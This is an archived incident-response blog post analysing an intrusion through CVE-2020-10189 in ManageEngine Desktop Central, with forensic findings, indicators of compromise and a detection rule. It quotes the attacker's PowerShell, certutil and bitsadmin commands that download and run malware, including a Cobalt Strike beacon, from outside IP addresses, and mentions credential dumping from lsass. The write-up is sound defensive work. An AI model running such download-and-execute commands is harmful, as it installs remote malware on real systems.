Analysis Of Exploitation: CVE-2020-10189
By Luke Rusten
Archived: 2026-04-05 15:23:53 UTC
The Recon incident response team recently worked an intrusion case involving a ManageEngine Desktop Central server that
was affected by CVE-2020-10189.
Zoho ManageEngine Desktop Central 10 allows remote code execution because of deserialization of untrusted
data in getChartImage in the FileStorage class. This is related to the CewolfServlet and
MDMLogUploaderServlet servlets.
https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle
Remote Code Execution vulnerability disclosed on Twitter
During our research of Desktop Central vulnerabilities we located a post on Twitter from a researcher who had disclosed an
RCE for Desktop Central on March 5, 2020 (Figure 1).
Figure 1 - Vulnerability disclosed on Twitter
Research on CVE-2020-10189 also showed that vulnerable Desktop Central servers were searchable on Shodan, a popular
search engine for Internet-connected devices often used by attackers looking for vulnerable targets (Figure 2).
Figure 2 - Vulnerable Desktop Central servers searchable on Shodan
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 1 of 11

Initial compromise was determined based on a suspicious PowerShell download cradle that contained instructions to
download files from a dotted quad url.
One of the earliest activities carried out by the actor are a few suspicious PowerShell download commands.  The commands
contained instructions to download  install.bat  and  storesyncsvc.dll  to  C:\Windows\Temp  and then immediately
execute  install.bat  (figure 3).
cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.
Figure 3 - Suspicious PowerShell download commands
The  install.bat  script contained instructions to install  storesyncsvc.dll  as a service on the system. (Figure 4).
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 2 of 11

Figure 4 - Install.bat contents
Predictably, within seconds of the suspicious PowerShell commands being run, we observed the installation of a new service
with the Service Name  StorSyncSvc  and Display Name of  Storage Sync Service  (Figure 5).
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 3 of 11

Figure 5 - Storage Sync Service install
OSINT quickly confirmed  storesyncsvc.dll  to be previously observed by others hit by this campaign. VirusTotal results
indicated that several detection engines had already classified  storesyncsvc.dll  as malware.
https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details
Leveraging Process Tracking to Identify Application Exploitation
Knowing that an RCE had been disclosed via Twitter on March 5, 2020, only a few days prior to this intrusion, we already
had a strong theory on the attack vector being exploitation of the Zoho ManageEngine Desktop Central application.
Review of Sysmon process creation events indicated that  C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe  was
the process responsible for executing the PowerShell Download commands (Figure 6).
Figure 6 - ParentImage responsible for PowerShell download
Looking at processes in memory, we also observed the parent/child relationship between the Desktop
Central  java.exe  application,  cmd.exe  and  2.exe  (Figure 7).
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 4 of 11

Figure 7 -  java.exe  parent/child process relationships
Leveraging Filesystem Artifacts to Identify Application Exploitation
To further validate our theory, we compared the artifacts that had been collected from the affected Desktop Central server to
the POC that had been published and determined that the attacker had likely leveraged the CVE-2020-10189 vulnerability to
run code on this vulnerable system.
Through filesystem timeline analysis we determined that a traversal file write had likely occurred on the system with the file
names   _chart  (Figure 8) and  logger.zip  (Figure 9).  
Figure 8 - File system analysis  _chart
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 5 of 11

Figure 9 - File system analysis  logger.zip
These file names were also referenced in the POC that had been released by @Steventseeley (Figure 10).
Figure 10 - POC references to  _chart  and  logger.zip , reference: https://srcincite.io/pocs/src-2020-
0011.py.txt
Command and Control Payload Introduced To System
Subsequent process creation logs revealed  cmd.exe  and  certutil.exe  commands being used to download and
execute  2.exe  (Figure 11). Further analysis revealed a high likelihood of   2.exe  being part of the popular post-exploitation and C2 tool Cobalt Strike.
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 6 of 11

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe
Figure 11 - Certutil commands 
OSINT revealed that  2.exe  was already identified as malware by several detection engines on
VirusTotal: https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/detai
Leveraging app.any.run sandbox (Figure 12) and memory analysis of the malware further confirmed the likelihood
of  2.exe  being a hosted Cobalt Strike Beacon payload.
Figure 12 -  2.exe  classified as Cobalt Strike Beacon
https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-
8e6d-94c6c80a74b6
YARA ANALYSIS SUPPORTS 2.EXE CLASSIFICATION AS COBALT STRIKE
We performed a yara scan against all memory sections in use by the known malware,  2.exe  . The yara scan results further
supported the theory of  2.exe  resembling a Cobalt Strike beacon among several other possible malware signature hits
(Figure 13).
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 7 of 11

Figure 13 - Yarascan results
Leveraging Volatility’s malfind plugin, we identified several memory sections with potential signs of code injection.  We
fired off another yara scan, this time against the memory sections dumped by malfind. This provided additional validation of
the likely presence of a Cobalt Strike Beacon. See that entire process in the asciinema recording below (Figure 14).
 
total 12M
drwxr-xr-x 2 root root 4.0K Mar 9 20:36 .
drwxr-xr-x 3 root root 4.0K Mar 10 02:35 ..
-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1bd05080.0xe40000.dmp
-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x1170000.dmp
-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x3790000.dmp
-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1ddaf080.0xfe0000.dmp
-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a21f78740.0x1aaf8510000.dmp
-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a23986800.0x20a9a9e0000.dmp
-rw-r--r-- 1 root root 1.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e280000.dmp
-rw-r--r-- 1 root root 2.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e380000.dmp
-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a2d400800.0x120000.dmp
-rw-r--r-- 1 root root 4.0M Mar 9 20:36 process.0xffffd00a2d400800.0x2660000.dmp
-rw-r--r-- 1 root root 276K Mar 9 20:36 process.0xffffd00a2d400800.0x2ca0000.dmp
-rw-r--r-- 1 root root 4.5M Mar 9 20:36 process.0xffffd00a2d7ef800.0x21738f20000.dmp
root@siftworkstation : /cases/desktopcentral/DesktopCentral
# apt install yara -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
 yara
0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
Need to get 117 kB of archives.
After this operation, 555 kB of additional disk space will be used.
Get:1 http://us.archive.ubuntu.com/ubuntu xenial/universe amd64 yara amd64 3.4.0+dfsg-2build1 [117 kB]
Fetched 117 kB in 0s (191 kB/s)
Selecting previously unselected package yara.
(Reading database ... 251659 files and directories currently installed.)
Preparing to unpack .../yara_3.4.0+dfsg-2build1_amd64.deb ...
Unpacking yara (3.4.0+dfsg-2build1) ...
Processing triggers for man-db (2.7.5-1) ...
Setting up yara (3.4.0+dfsg-2build1) ...
root@siftworkstation : /cases/desktopcentral/DesktopCentral
#
 
Figure 14 - Yarascan against malfind output
We then examined malfind’s output for evidence of code injection and identified suspicious memory sections
within  svchost.exe  (Figure 15).  OSINT research led us to a researcher that had reversed the malware and found the area
responsible for injecting code into  svchost.exe  (Figure 16).  
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 8 of 11

Figure 15 - Our analysis of svchost containing injected code
Figure 16 - @VK_Intel’s analysis showing likely inject function
Reference:
Among the post-compromise activities, we observed malicious Bitsadmin commands that contained instructions to
transfer  install.bat  from  66.42.96.220  over suspicious port  12345 .
Our analysts observed bitsadmin commands being run on the Desktop Central server which contained the same IP address,
port and the same install.bat file called in the PowerShell download commands (Figure 17).
cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat
Figure 17 - Bitsadmin commands
Credential Access
We also observed potential credential access activity. A common technique for attackers to perform credential dumping is
using a malicious process (SourceImage) to access another process (the TargetImage). Most commonly,  lsass.exe  is
targeted as it often contains sensitive information such as account credentials.
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 9 of 11

Here, we observed the SourceImage  2.exe  accessing the TargetImage  lsass.exe  (Figure 18).  The Cobalt Strike Beacon
contains native credential dumping capabilities similar to Mimikatz. The only required condition to use this capability is
SYSTEM privileges, which the attacker had.  The event below provides sufficient evidence that the risk of credential access
is high.
Figure 18 -  2.exe  accessing  lsass.exe
During our analysis of this intrusion, we added a few collection targets to Eric Zimmerman's KAPE tool to add the relevant
logs to triage efforts. Read more about KAPE.
Example usage targeting relevant logs (tune for your use-case):
kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs
IOCs
Storesyncsvc.dll
MD5:  5909983db4d9023e4098e56361c96a6f
SHA256:  f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c
Install.bat
MD5:  7966c2c546b71e800397a67f942858d0
SHA256:  de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc
2.exe
MD5:  3e856162c36b532925c8226b4ed3481c
SHA256:  d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309
66[.]42[.]98[.]220
91[.]208[.]184[.]78
74[.]82[.]201[.]8
Detection
Florian Roth of the Sigma project has created a signature to detect some of the techniques leveraged by the attackers:
https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml
Our analysis of this attack also found that detection based on command-line activity in process creation logs would be
valuable.
ParentImage | endswith:
'DesktopCentral_Server\jre\bin\java.exe'
CommandLine | contains:
'*powershell*'
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 10 of 11

'*certutil*'
'*bitsadmin*'
DFIR, Incident Response, Forensics, SecOps, InfoSec, Defense, Malware, Exploit, CVE-2020-10189, Intel Sharing, Zoho,
Vulnerability, ManageEngine
Source: https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
Page 11 of 11